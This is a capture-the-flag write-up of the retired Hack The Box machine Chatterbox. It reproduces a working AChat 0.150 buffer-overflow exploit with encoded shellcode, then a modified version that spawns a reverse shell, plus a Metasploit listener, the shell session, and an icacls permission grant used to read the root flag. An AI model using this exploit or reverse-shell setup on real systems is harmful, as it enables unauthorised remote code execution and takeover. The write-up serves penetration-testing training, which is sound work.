This box was just retired on Hackthebox.eu. It involves getting to exploit the infamous achat application. Lets see how to get root on this machine!
Enumeration
As always, we start with an nmap scan:
[bash]
nmap -sV -sC -oA initial-nmap 10.10.10.74
[/bash]
The -sU triggers all scripts nmap has against found services , while -sV probes open ports to determine which service/version is running on the box. The -oA makes sure that the output of the scan is stored in all possible formats.
This initial scans resulted in: 0 services. Let cast the net a bit broader and scan all the ports on this machine:
[bash]
nmap -sV -sC -oA fullport-nmap -p- 10.10.10.74
[/bash]
As you can see, I’ve added the -p- trigger in there to scan all ports. We get some nice results back:
[bash]
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 22:40 CEST
Stats: 0:00:33 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.33% done; ETC: 23:03 (0:22:19 remaining)
Stats: 0:01:57 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 8.69% done; ETC: 23:02 (0:20:19 remaining)
Stats: 0:10:40 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.10.74
Host is up (0.020s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn’t have a title.
9256/tcp open achat AChat chat system
[/bash]
Exploitation
So we have AChat running on both port 9255 and 9256. Lets do a quick Google on this piece of software. The sourceforge page linked to the project shows that the last commit was made in 2013, which brings the latest version to 0.150. We can safely assume that Chatterbox is running that version of AChat. Lets see what exploitdb has on this.
[bash]
searchsploit achat
————————————————————————————-
Exploit Title | Path
| (/usr/share/exploitdb/)
————————————————————————————-
Achat 0.150 beta7 – Remote Buffer Overflow | exploits/windows/remote/36025.py
Achat 0.150 beta7 – Remote Buffer Overflow (Metasploit) | exploits/windows/remote/36056.rb
MataChat – ‘input.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32958.txt
Parachat 5.5 – Directory Traversal | exploits/php/webapps/24647.txt
————————————————————————————-
Shellcodes: No Result
[/bash]
We have multiple hits. Cool. Lets start by looking at the non Metasploit exploit (36025.py):
[bash]
!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 – Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x69\x6c\x77\x78\x62\x62"
buf += "\x69\x70\x59\x70\x4b\x50\x73\x30\x43\x59\x5a\x45\x50"
buf += "\x31\x67\x50\x4f\x74\x34\x4b\x50\x50\x4e\x50\x34\x4b"
buf += "\x30\x52\x7a\x6c\x74\x4b\x70\x52\x4e\x34\x64\x4b\x63"
buf += "\x42\x4f\x38\x4a\x6f\x38\x37\x6d\x7a\x4d\x56\x4d\x61"
buf += "\x49\x6f\x74\x6c\x4f\x4c\x6f\x71\x33\x4c\x69\x72\x4e"
buf += "\x4c\x4f\x30\x66\x61\x58\x4f\x5a\x6d\x59\x71\x67\x57"
buf += "\x68\x62\x48\x72\x52\x32\x50\x57\x54\x4b\x72\x32\x4e"
buf += "\x30\x64\x4b\x6e\x6a\x4d\x6c\x72\x6b\x70\x4c\x4a\x71"
buf += "\x43\x48\x39\x53\x71\x38\x6a\x61\x36\x71\x4f\x61\x62"
buf += "\x6b\x42\x39\x4f\x30\x4a\x61\x38\x53\x62\x6b\x30\x49"
buf += "\x6b\x68\x58\x63\x4e\x5a\x6e\x69\x44\x4b\x6f\x44\x72"
buf += "\x6b\x4b\x51\x36\x76\x70\x31\x69\x6f\x46\x4c\x57\x51"
buf += "\x48\x4f\x4c\x4d\x6a\x61\x55\x77\x4f\x48\x57\x70\x54"
buf += "\x35\x49\x66\x49\x73\x51\x6d\x7a\x58\x6d\x6b\x53\x4d"
buf += "\x4e\x44\x34\x35\x38\x64\x62\x38\x62\x6b\x52\x38\x6b"
buf += "\x74\x69\x71\x4a\x33\x33\x36\x54\x4b\x7a\x6c\x6e\x6b"
buf += "\x72\x6b\x51\x48\x6d\x4c\x6b\x51\x67\x63\x52\x6b\x49"
buf += "\x74\x72\x6b\x4d\x31\x7a\x30\x44\x49\x51\x34\x6e\x44"
buf += "\x4b\x74\x61\x4b\x51\x4b\x4f\x71\x51\x49\x71\x4a\x52"
buf += "\x31\x49\x6f\x69\x50\x31\x4f\x51\x4f\x6e\x7a\x34\x4b"
buf += "\x6a\x72\x38\x6b\x44\x4d\x71\x4d\x50\x6a\x59\x71\x64"
buf += "\x4d\x35\x35\x65\x62\x4b\x50\x49\x70\x4b\x50\x52\x30"
buf += "\x32\x48\x6c\x71\x64\x4b\x72\x4f\x51\x77\x59\x6f\x79"
buf += "\x45\x45\x6b\x48\x70\x75\x65\x35\x52\x30\x56\x72\x48"
buf += "\x33\x76\x35\x45\x37\x4d\x63\x6d\x49\x6f\x37\x65\x6d"
buf += "\x6c\x6a\x66\x31\x6c\x79\x7a\x51\x70\x4b\x4b\x67\x70"
buf += "\x53\x45\x6d\x35\x55\x6b\x31\x37\x4e\x33\x32\x52\x30"
buf += "\x6f\x42\x4a\x6d\x30\x50\x53\x79\x6f\x37\x65\x70\x63"
buf += "\x53\x31\x72\x4c\x30\x63\x4c\x6e\x70\x65\x32\x58\x50"
buf += "\x65\x6d\x30\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (‘192.168.91.130’, 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 – len(buf))
p += "\x00" + "A"*10 + "\x00"
print "—->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
[/bash]
This POC appears to be aimed a triggering a buffer overflow. Before we can test it, we have to edit a couple of this:
- The Hexcode is aimed at triggering the calculator (Calc.exe) instead of spawning a reverse shell. This is quite common for POC’s, but something to be taken into account. We can use msfvenom to create our own code.
- The current server address is pointing at 192.168.91.130. You need to change this to the IP of the machine your are performing the attack from.
Lets start by generating some hexcode that we can use to setup a reverse shell. The POC already states which msfvenom comand was used to generate the payload:
[bash]
msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff’ BufferRegister=EAX -f python</pre>
[/bash]
Lets change this to something we can make work for ourselves:
[bash]</pre>
#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 – Buffer Overflow
# Tested on Windows 7 32bit
import socket
import sys, time
# msfvenom -a x86 –platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b ‘\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9$
#Payload size: 512 bytes
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x6b\x38\x55\x32"
buf += "\x69\x70\x4b\x50\x4b\x50\x71\x50\x75\x39\x47\x75\x4c"
buf += "\x71\x45\x70\x52\x44\x72\x6b\x72\x30\x50\x30\x44\x4b"
buf += "\x4e\x72\x7a\x6c\x42\x6b\x72\x32\x5a\x74\x72\x6b\x54"
buf += "\x32\x4b\x78\x7a\x6f\x46\x57\x30\x4a\x6c\x66\x6e\x51"
buf += "\x6b\x4f\x46\x4c\x6d\x6c\x31\x51\x71\x6c\x6b\x52\x6e"
buf += "\x4c\x6b\x70\x55\x71\x68\x4f\x4c\x4d\x49\x71\x36\x67"
buf += "\x6b\x32\x7a\x52\x30\x52\x72\x37\x34\x4b\x4f\x62\x4c"
buf += "\x50\x52\x6b\x6f\x5a\x6d\x6c\x32\x6b\x6e\x6c\x6a\x71"
buf += "\x73\x48\x48\x63\x4d\x78\x4a\x61\x57\x61\x6f\x61\x34"
buf += "\x4b\x30\x59\x4b\x70\x5a\x61\x76\x73\x42\x6b\x6e\x69"
buf += "\x4d\x48\x6b\x33\x6f\x4a\x70\x49\x72\x6b\x6d\x64\x74"
buf += "\x4b\x6a\x61\x36\x76\x4e\x51\x49\x6f\x36\x4c\x46\x61"
buf += "\x38\x4f\x4c\x4d\x49\x71\x39\x37\x6d\x68\x39\x50\x73"
buf += "\x45\x4b\x46\x49\x73\x71\x6d\x6b\x48\x4d\x6b\x71\x6d"
buf += "\x4b\x74\x61\x65\x57\x74\x62\x38\x72\x6b\x61\x48\x4d"
buf += "\x54\x6b\x51\x79\x43\x61\x56\x62\x6b\x4a\x6c\x70\x4b"
buf += "\x74\x4b\x70\x58\x6d\x4c\x6d\x31\x78\x53\x44\x4b\x7a"
buf += "\x64\x72\x6b\x4b\x51\x48\x50\x71\x79\x71\x34\x6f\x34"
buf += "\x6f\x34\x71\x4b\x71\x4b\x63\x31\x6e\x79\x6f\x6a\x70"
buf += "\x51\x39\x6f\x69\x50\x4f\x6f\x61\x4f\x71\x4a\x64\x4b"
buf += "\x6b\x62\x7a\x4b\x52\x6d\x6f\x6d\x53\x38\x4d\x63\x4d"
buf += "\x62\x6d\x30\x6d\x30\x43\x38\x54\x37\x51\x63\x4e\x52"
buf += "\x51\x4f\x4f\x64\x70\x68\x4e\x6c\x34\x37\x6b\x76\x6c"
buf += "\x47\x65\x39\x58\x68\x49\x6f\x5a\x30\x47\x48\x34\x50"
buf += "\x7a\x61\x6d\x30\x79\x70\x6d\x59\x37\x54\x70\x54\x4e"
buf += "\x70\x61\x58\x4b\x79\x71\x70\x32\x4b\x59\x70\x6b\x4f"
buf += "\x59\x45\x72\x4a\x6c\x4a\x63\x38\x5a\x6a\x69\x7a\x6e"
buf += "\x30\x6a\x78\x43\x38\x49\x72\x39\x70\x4c\x50\x62\x72"
buf += "\x51\x79\x6a\x46\x4e\x70\x30\x50\x32\x30\x72\x30\x31"
buf += "\x6b\x4f\x46\x4c\x6d\x6c\x31\x51\x71\x6c\x6b\x52\x6e"
buf += "\x4c\x6b\x70\x55\x71\x68\x4f\x4c\x4d\x49\x71\x36\x67"
buf += "\x6b\x32\x7a\x52\x30\x52\x72\x37\x34\x4b\x4f\x62\x4c"
buf += "\x50\x52\x6b\x6f\x5a\x6d\x6c\x32\x6b\x6e\x6c\x6a\x71"
buf += "\x73\x48\x48\x63\x4d\x78\x4a\x61\x57\x61\x6f\x61\x34"
buf += "\x4b\x30\x59\x4b\x70\x5a\x61\x76\x73\x42\x6b\x6e\x69"
buf += "\x4d\x48\x6b\x33\x6f\x4a\x70\x49\x72\x6b\x6d\x64\x74"
buf += "\x4b\x6a\x61\x36\x76\x4e\x51\x49\x6f\x36\x4c\x46\x61"
buf += "\x38\x4f\x4c\x4d\x49\x71\x39\x37\x6d\x68\x39\x50\x73"
buf += "\x45\x4b\x46\x49\x73\x71\x6d\x6b\x48\x4d\x6b\x71\x6d"
buf += "\x4b\x74\x61\x65\x57\x74\x62\x38\x72\x6b\x61\x48\x4d"
buf += "\x54\x6b\x51\x79\x43\x61\x56\x62\x6b\x4a\x6c\x70\x4b"
buf += "\x74\x4b\x70\x58\x6d\x4c\x6d\x31\x78\x53\x44\x4b\x7a"
buf += "\x64\x72\x6b\x4b\x51\x48\x50\x71\x79\x71\x34\x6f\x34"
buf += "\x6f\x34\x71\x4b\x71\x4b\x63\x31\x6e\x79\x6f\x6a\x70"
buf += "\x51\x39\x6f\x69\x50\x4f\x6f\x61\x4f\x71\x4a\x64\x4b"
buf += "\x6b\x62\x7a\x4b\x52\x6d\x6f\x6d\x53\x38\x4d\x63\x4d"
buf += "\x62\x6d\x30\x6d\x30\x43\x38\x54\x37\x51\x63\x4e\x52"
buf += "\x51\x4f\x4f\x64\x70\x68\x4e\x6c\x34\x37\x6b\x76\x6c"
buf += "\x47\x65\x39\x58\x68\x49\x6f\x5a\x30\x47\x48\x34\x50"
buf += "\x7a\x61\x6d\x30\x79\x70\x6d\x59\x37\x54\x70\x54\x4e"
buf += "\x70\x61\x58\x4b\x79\x71\x70\x32\x4b\x59\x70\x6b\x4f"
buf += "\x59\x45\x72\x4a\x6c\x4a\x63\x38\x5a\x6a\x69\x7a\x6e"
buf += "\x30\x6a\x78\x43\x38\x49\x72\x39\x70\x4c\x50\x62\x72"
buf += "\x51\x79\x6a\x46\x4e\x70\x30\x50\x32\x30\x72\x30\x31"
buf += "\x30\x50\x50\x6d\x70\x50\x50\x6f\x78\x69\x5a\x6c\x4f"
buf += "\x49\x4f\x59\x50\x39\x6f\x39\x45\x33\x67\x70\x6a\x4e"
buf += "\x30\x70\x56\x52\x37\x31\x58\x36\x39\x53\x75\x43\x44"
buf += "\x61\x51\x4b\x4f\x48\x55\x54\x45\x69\x30\x73\x44\x39"
buf += "\x7a\x4b\x4f\x70\x4e\x39\x78\x52\x55\x48\x6c\x67\x78"
buf += "\x71\x57\x6d\x30\x69\x70\x4b\x50\x50\x6a\x69\x70\x52"
buf += "\x4a\x59\x74\x50\x56\x62\x37\x31\x58\x6d\x32\x66\x79"
buf += "\x76\x68\x6f\x6f\x69\x6f\x49\x45\x51\x73\x6a\x58\x79"
buf += "\x70\x63\x4e\x4e\x56\x62\x6b\x4d\x66\x42\x4a\x71\x30"
buf += "\x52\x48\x6d\x30\x4a\x70\x79\x70\x6d\x30\x6f\x66\x32"
buf += "\x4a\x6d\x30\x73\x38\x32\x38\x44\x64\x4f\x63\x57\x75"
buf += "\x4b\x4f\x49\x45\x34\x53\x61\x43\x71\x5a\x59\x70\x50"
buf += "\x56\x70\x53\x52\x37\x62\x48\x4a\x62\x37\x69\x56\x68"
buf += "\x4f\x6f\x4b\x4f\x59\x45\x64\x43\x78\x78\x79\x70\x61"
buf += "\x6d\x4e\x48\x6f\x68\x71\x58\x59\x70\x61\x30\x6d\x30"
buf += "\x59\x70\x61\x5a\x59\x70\x32\x30\x61\x58\x6a\x6b\x6e"
buf += "\x4f\x5a\x6f\x50\x30\x59\x6f\x4a\x35\x32\x37\x61\x58"
buf += "\x74\x35\x62\x4e\x70\x4d\x4f\x71\x4b\x4f\x79\x45\x61"
buf += "\x4e\x6f\x6e\x39\x6f\x4a\x6c\x4b\x74\x7a\x6f\x44\x45"
buf += "\x74\x30\x69\x6f\x69\x6f\x4b\x4f\x6a\x49\x35\x4b\x59"
buf += "\x6f\x6b\x4f\x59\x6f\x6b\x51\x69\x33\x6c\x69\x48\x46"
buf += "\x63\x45\x79\x31\x66\x63\x65\x6b\x78\x70\x48\x35\x37"
buf += "\x32\x51\x46\x61\x5a\x4d\x30\x4e\x73\x49\x6f\x59\x45"
buf += "\x41\x41"
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (‘10.10.10.74’, 9256)
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 – len(buf))
p += "\x00" + "A"*10 + "\x00"
print "—->{P00F}!"
i=0
while i<len(p):
if i > 172000:
time.sleep(1.0)
sent = sock.sendto(p[i:(i+8192)], server_address)
i += sent
sock.close()
<pre>[/bash]
Setup a catcher for the reverse shell:
[bash]
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST tun0
LHOST => tun0
msf exploit(multi/handler) > set LPORT 4242
LPORT => 4242
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.16.X:4242
msf exploit(multi/handler) > [*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.74
[*] Command shell session 1 opened (10.10.16.X:4242 -> 10.10.10.74:49178)
[/bash]
Aaaaaand:
[bash]
msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1…
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32\ whoami
chatterbox\alfred
[/bash]
You can find the user key in the /Desktop folder.
Privilege Escalation
Now, for root. How to proceed? One of the first things I always check on a Windows machine are the (i)calcs settings. icalcs stands for Integrity Control and Access Control List. It is a Microsoft Windows native command line utilities capable of displaying and modifying the security descriptors on folders and files. An access control list is a list of permissions for securable object, such as a file or folder, that controls who can access it.
it seems that Alfred has ownership of the root flag, but cannot read it. By using icalcs, we can change this:
[bash]
icacls.exe root.txt /grant CHATTERBOX\Alfred:F
[/bash]
We can then browse to the Desktop folder of the administrator, where we find root.txt. Thus concludes Chatterbox.
Check out this awesome video by Ippsec. He also explores how to get the same results using Powershell Empire instead of Metasploit. Worth looking at!